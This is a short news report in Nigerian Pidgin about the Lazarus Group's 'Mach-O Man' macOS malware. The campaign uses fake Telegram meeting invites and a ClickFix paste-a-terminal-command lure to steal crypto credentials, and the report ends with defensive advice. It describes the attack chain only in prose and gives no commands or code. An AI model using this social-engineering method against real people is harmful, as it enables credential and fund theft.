Lazarus Mach-O macOS malware dey use fake Telegram meeting invites to kpokpo crypto credentials

North Korea Lazarus Group dey deploy macOS malware wey dem dey call "Mach-O Man" to target crypto and fintech executives through social engineering. The attack start with urgent meeting invites wey dem send for Telegram, pretending to be Zoom, Microsoft Teams, or Google Meet, then dem redirect victims go fake site using ClickFix technique—dem go tell users make dem paste terminal command to "fix" connection issue. After person run am, Mach-O Man toolkit go install modular Mach-O components to profile the device, set persistence, and steal credentials plus browser data. Exfiltration dey pass through Telegram-based command-and-control channel. The malware get auto-delete behavior after execution wey dey make incident response and forensics harder. CertiK link the campaign to Lazarus’ Famous Chollima unit and talk say e deliver through compromised Telegram accounts wey dem target high-value digital-asset organizations. The report also tie Mach-O Man to bigger Lazarus theft spree, with more than $500M wey dem steal from DeFi platforms Drift and KelpDAO in the past two weeks. For crypto traders, the practical takeaway na risk control: treat unexpected meeting requests—especially those wey dey instruct terminal commands—like high-risk Lazarus Mach-O Man social engineering attempt. Verify invites through separate channel before you click links or run any instructions.